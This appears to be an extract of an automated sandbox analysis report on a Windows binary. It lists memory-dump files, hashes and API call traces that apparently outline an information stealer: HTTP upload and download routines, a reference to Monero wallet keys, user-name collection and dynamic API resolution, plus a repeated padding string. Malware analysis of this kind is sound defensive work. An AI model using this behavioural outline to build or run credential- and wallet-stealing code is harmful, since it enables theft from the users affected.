                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B477B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 7b773f08b32c9c5cf2b71ac69d1d61b9f1da9439b9e2a2657423348496288b62
                              • Instruction ID: ff456fa3e60f370ab66cd3e2063389409af889ced2bb1754997da20f4d9c034a
                              • Opcode Fuzzy Hash: 7b773f08b32c9c5cf2b71ac69d1d61b9f1da9439b9e2a2657423348496288b62
                              • Instruction Fuzzy Hash: E641D060AC3E88EBE778F7A5CC42E9D77575F46F0DB505046EA0052382DFB8B50CA526

                              Control-flow Graph

                              (Rendered control-flow graph of function 001B4880, basic blocks 1b4880-1b4fa2, with its executed/not-executed colouring, is not included in this extract.)
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001B4915
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001D0DDB,00000000,?,?,00000000,?,",00000000,?,00EEE588), ref: 001B4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001B4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001B4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001B4E49
                              • InternetCloseHandle.WININET(00000000), ref: 001B4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 001B4EC5
                              • HttpOpenRequestA.WININET(00000000,00EEE448,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B4B15
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • InternetCloseHandle.WININET(00000000), ref: 001B4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------$H
                              • API String ID: 460715078-2516411888
                              • Opcode ID: ba3ae2243a7f4cbd03262e288e2251aefc7903cb668f1f5afaac6f2b6bc9fd16
                              • Instruction ID: 8eb41e15c530ec52691979b57a2b8f6c4a3661eace7ba3ef059bbe2f4f5a2591
                              • Opcode Fuzzy Hash: ba3ae2243a7f4cbd03262e288e2251aefc7903cb668f1f5afaac6f2b6bc9fd16
                              • Instruction Fuzzy Hash: D612BB7195011CABDB16EB90DCA2FEEB378AF34309F90419DB10662491DF70AF49CB66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a8d2672b6ee952090b378eddfc23385597fc422925f970d0a57ec7db8dd69320
                              • Instruction ID: 50b132af8b991cc9d69bd1296d43cff30cf87bab2c2f1bd037245994d78e0edf
                              • Opcode Fuzzy Hash: a8d2672b6ee952090b378eddfc23385597fc422925f970d0a57ec7db8dd69320
                              • Instruction Fuzzy Hash: E0F04FF1944608AFC714DF99DD49FAEBBBCFB05761F10025AFA05A3680C7B45904CBA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: bd0f306014f19f692f5b2720d3862b2e56082c8372daccf47cbfaaaf6b12cbf2
                              • Instruction ID: 739e82c11327d3eb4911d54c1b86a285e15f263e82d6ef7ac20ba8a0ea0c6d4d
                              • Opcode Fuzzy Hash: bd0f306014f19f692f5b2720d3862b2e56082c8372daccf47cbfaaaf6b12cbf2
                              • Instruction Fuzzy Hash: AED05EB490030CDBCB00EFE0D849AEDBB7CFB08312F000554DD0972340EB306485CAA6

                              Control-flow Graph

                              (Rendered control-flow graph of function 001C9C10, basic blocks 1c9c10-1ca709, with its executed/not-executed colouring, is not included in this extract.)
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00ED5528), ref: 001C9C2D
                              • GetProcAddress.KERNEL32(75900000,00ED52A8), ref: 001C9C45
                              • GetProcAddress.KERNEL32(75900000,00EE8BA0), ref: 001C9C5E
                              • GetProcAddress.KERNEL32(75900000,00EE8BD0), ref: 001C9C76
                              • GetProcAddress.KERNEL32(75900000,00EEC9B0), ref: 001C9C8E
                              • GetProcAddress.KERNEL32(75900000,00EEC950), ref: 001C9CA7
                              • GetProcAddress.KERNEL32(75900000,00EDB030), ref: 001C9CBF
                              • GetProcAddress.KERNEL32(75900000,00EEC800), ref: 001C9CD7
                              • GetProcAddress.KERNEL32(75900000,00EECA70), ref: 001C9CF0
                              • GetProcAddress.KERNEL32(75900000,00EEC8F0), ref: 001C9D08
                              • GetProcAddress.KERNEL32(75900000,00EEC7E8), ref: 001C9D20
                              • GetProcAddress.KERNEL32(75900000,00ED5468), ref: 001C9D39
                              • GetProcAddress.KERNEL32(75900000,00ED5268), ref: 001C9D51
                              • GetProcAddress.KERNEL32(75900000,00ED5488), ref: 001C9D69
                              • GetProcAddress.KERNEL32(75900000,00ED5328), ref: 001C9D82
                              • GetProcAddress.KERNEL32(75900000,00EECA40), ref: 001C9D9A
                              • GetProcAddress.KERNEL32(75900000,00EEC818), ref: 001C9DB2
                              • GetProcAddress.KERNEL32(75900000,00EDAF90), ref: 001C9DCB
                              • GetProcAddress.KERNEL32(75900000,00ED5548), ref: 001C9DE3
                              • GetProcAddress.KERNEL32(75900000,00EEC848), ref: 001C9DFB
                              • GetProcAddress.KERNEL32(75900000,00EEC968), ref: 001C9E14
                              • GetProcAddress.KERNEL32(75900000,00EEC998), ref: 001C9E2C
                              • GetProcAddress.KERNEL32(75900000,00EEC8C0), ref: 001C9E44
                              • GetProcAddress.KERNEL32(75900000,00ED5568), ref: 001C9E5D
                              • GetProcAddress.KERNEL32(75900000,00EEC9C8), ref: 001C9E75
                              • GetProcAddress.KERNEL32(75900000,00EEC980), ref: 001C9E8D
                              • GetProcAddress.KERNEL32(75900000,00EEC860), ref: 001C9EA6
                              • GetProcAddress.KERNEL32(75900000,00EEC9E0), ref: 001C9EBE
                              • GetProcAddress.KERNEL32(75900000,00EEC878), ref: 001C9ED6
                              • GetProcAddress.KERNEL32(75900000,00EEC830), ref: 001C9EEF
                              • GetProcAddress.KERNEL32(75900000,00EECA28), ref: 001C9F07
                              • GetProcAddress.KERNEL32(75900000,00EEC890), ref: 001C9F1F
                              • GetProcAddress.KERNEL32(75900000,00EEC9F8), ref: 001C9F38
                              • GetProcAddress.KERNEL32(75900000,00EE9DC0), ref: 001C9F50
                              • GetProcAddress.KERNEL32(75900000,00EEC8A8), ref: 001C9F68
                              • GetProcAddress.KERNEL32(75900000,00EEC8D8), ref: 001C9F81
                              • GetProcAddress.KERNEL32(75900000,00ED5588), ref: 001C9F99
                              • GetProcAddress.KERNEL32(75900000,00EEC908), ref: 001C9FB1
                              • GetProcAddress.KERNEL32(75900000,00ED55A8), ref: 001C9FCA
                              • GetProcAddress.KERNEL32(75900000,00EECA88), ref: 001C9FE2
                              • GetProcAddress.KERNEL32(75900000,00EECA10), ref: 001C9FFA
                              • GetProcAddress.KERNEL32(75900000,00ED51C8), ref: 001CA013
                              • GetProcAddress.KERNEL32(75900000,00ED51E8), ref: 001CA02B
                              • LoadLibraryA.KERNEL32(00EECA58,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA03D
                              • LoadLibraryA.KERNEL32(00EECAA0,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA04E
                              • LoadLibraryA.KERNEL32(00EEC920,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA060
                              • LoadLibraryA.KERNEL32(00EEC7B8,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA072
                              • LoadLibraryA.KERNEL32(00EEC7D0,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA083
                              • LoadLibraryA.KERNEL32(00EEC938,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA095
                              • LoadLibraryA.KERNEL32(00EECB00,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA0A7
                              • LoadLibraryA.KERNEL32(00EECC38,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA0B8
                              • GetProcAddress.KERNEL32(75FD0000,00ED5868), ref: 001CA0DA
                              • GetProcAddress.KERNEL32(75FD0000,00EECBF0), ref: 001CA0F2
                              • GetProcAddress.KERNEL32(75FD0000,00EE8A68), ref: 001CA10A
                              • GetProcAddress.KERNEL32(75FD0000,00EECC80), ref: 001CA123
                              • GetProcAddress.KERNEL32(75FD0000,00ED5908), ref: 001CA13B
                              • GetProcAddress.KERNEL32(734B0000,00EDB120), ref: 001CA160
                              • GetProcAddress.KERNEL32(734B0000,00ED5768), ref: 001CA179
                              • GetProcAddress.KERNEL32(734B0000,00EDB260), ref: 001CA191
                              • GetProcAddress.KERNEL32(734B0000,00EECC98), ref: 001CA1A9
                              • GetProcAddress.KERNEL32(734B0000,00EECD58), ref: 001CA1C2
                              • GetProcAddress.KERNEL32(734B0000,00ED5808), ref: 001CA1DA
                              • GetProcAddress.KERNEL32(734B0000,00ED5968), ref: 001CA1F2
                              • GetProcAddress.KERNEL32(734B0000,00EECB18), ref: 001CA20B
                              • GetProcAddress.KERNEL32(763B0000,00ED5628), ref: 001CA22C
                              • GetProcAddress.KERNEL32(763B0000,00ED56C8), ref: 001CA244
                              • GetProcAddress.KERNEL32(763B0000,00EECB48), ref: 001CA25D
                              • GetProcAddress.KERNEL32(763B0000,00EECCF8), ref: 001CA275
                              • GetProcAddress.KERNEL32(763B0000,00ED5828), ref: 001CA28D
                              • GetProcAddress.KERNEL32(750F0000,00EDB080), ref: 001CA2B3
                              • GetProcAddress.KERNEL32(750F0000,00EDADB0), ref: 001CA2CB
                              • GetProcAddress.KERNEL32(750F0000,00EECCE0), ref: 001CA2E3
                              • GetProcAddress.KERNEL32(750F0000,00ED5648), ref: 001CA2FC
                              • GetProcAddress.KERNEL32(750F0000,00ED5668), ref: 001CA314
                              • GetProcAddress.KERNEL32(750F0000,00EDADD8), ref: 001CA32C
                              • GetProcAddress.KERNEL32(75A50000,00EECC50), ref: 001CA352
                              • GetProcAddress.KERNEL32(75A50000,00ED56E8), ref: 001CA36A
                              • GetProcAddress.KERNEL32(75A50000,00EE8A88), ref: 001CA382
                              • GetProcAddress.KERNEL32(75A50000,00EECB30), ref: 001CA39B
                              • GetProcAddress.KERNEL32(75A50000,00EECD10), ref: 001CA3B3
                              • GetProcAddress.KERNEL32(75A50000,00ED5688), ref: 001CA3CB
                              • GetProcAddress.KERNEL32(75A50000,00ED5608), ref: 001CA3E4
                              • GetProcAddress.KERNEL32(75A50000,00EECAE8), ref: 001CA3FC
                              • GetProcAddress.KERNEL32(75A50000,00EECC20), ref: 001CA414
                              • GetProcAddress.KERNEL32(75070000,00ED5888), ref: 001CA436
                              • GetProcAddress.KERNEL32(75070000,00EECCC8), ref: 001CA44E
                              • GetProcAddress.KERNEL32(75070000,00EECD28), ref: 001CA466
                              • GetProcAddress.KERNEL32(75070000,00EECB60), ref: 001CA47F
                              • GetProcAddress.KERNEL32(75070000,00EECC68), ref: 001CA497
                              • GetProcAddress.KERNEL32(74E50000,00ED58E8), ref: 001CA4B8
                              • GetProcAddress.KERNEL32(74E50000,00ED57E8), ref: 001CA4D1
                              • GetProcAddress.KERNEL32(75320000,00ED5708), ref: 001CA4F2
                              • GetProcAddress.KERNEL32(75320000,00EECB78), ref: 001CA50A
                              • GetProcAddress.KERNEL32(6F060000,00ED5848), ref: 001CA530
                              • GetProcAddress.KERNEL32(6F060000,00ED58A8), ref: 001CA548
                              • GetProcAddress.KERNEL32(6F060000,00ED58C8), ref: 001CA560
                              • GetProcAddress.KERNEL32(6F060000,00EECD70), ref: 001CA579
                              • GetProcAddress.KERNEL32(6F060000,00ED5728), ref: 001CA591
                              • GetProcAddress.KERNEL32(6F060000,00ED55C8), ref: 001CA5A9
                              • GetProcAddress.KERNEL32(6F060000,00ED55E8), ref: 001CA5C2
                              • GetProcAddress.KERNEL32(6F060000,00ED5928), ref: 001CA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001CA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001CA607
                              • GetProcAddress.KERNEL32(74E00000,00EECCB0), ref: 001CA629
                              • GetProcAddress.KERNEL32(74E00000,00EE89D8), ref: 001CA641
                              • GetProcAddress.KERNEL32(74E00000,00EECD40), ref: 001CA659
                              • GetProcAddress.KERNEL32(74E00000,00EECB90), ref: 001CA672
                              • GetProcAddress.KERNEL32(74DF0000,00ED5748), ref: 001CA693
                              • GetProcAddress.KERNEL32(6F9C0000,00EECD88), ref: 001CA6B4
                              • GetProcAddress.KERNEL32(6F9C0000,00ED5788), ref: 001CA6CD
                              • GetProcAddress.KERNEL32(6F9C0000,00EECBA8), ref: 001CA6E5
                              • GetProcAddress.KERNEL32(6F9C0000,00EECBC0), ref: 001CA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: (S$(U$(V$(W$(X$(Y$HU$HV$HW$HX$HttpQueryInfoA$InternetSetOptionA$hR$hT$hU$hV$hW$hX$hY$Q$U$V$W$X
                              • API String ID: 2238633743-1331378193
                              • Opcode ID: 8e727a900245297a784616c08c77e3a16200cde6260c0042c2643a965e321f98
                              • Instruction ID: 9b9a6584b696e2c9cacaf7578bec29285b076ee1a7c442be307d661ad71cf1c0
                              • Opcode Fuzzy Hash: 8e727a900245297a784616c08c77e3a16200cde6260c0042c2643a965e321f98
                              • Instruction Fuzzy Hash: BF6228F5600A01AFC346EFAAED88D763BFDE74C341F14851AE60DC3264D679A849DB12

                               Control-flow Graph
                               • Rendered graph not reproduced. Recoverable structure: function 001B6280 to 001B652D. Main path: calls to 001CA7A0, 001B47B0 and 001CA740, then InternetOpenA and StrCmpCA (001B6280-001B630B); InternetConnectA (001B631E); HttpOpenRequestA (001B6364); InternetSetOptionA on one branch only (001B639E); HttpSendRequestA and HttpQueryInfoA (001B63C5-001B6405). The result of the status query selects between an early return through 001CA740/001CA800 (001B6407) and a call to 001C8940 followed by an InternetReadFile loop (001B6456-001B64C5, calling 001CA9B0, 001CA8A0 and 001CA800 per chunk). Failure at any stage falls through the three InternetCloseHandle calls (001B64C7, 001B64F5, 001B64FF) to the common exit at 001B6509.
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001B63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001B646D
                              • InternetCloseHandle.WININET(00000000), ref: 001B64EF
                              • InternetCloseHandle.WININET(00000000), ref: 001B64F9
                              • InternetCloseHandle.WININET(00000000), ref: 001B6503
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 3ecfc28f7235a802a4f482d3145b7a8160af779e7db8383a6249bea6eb34cb07
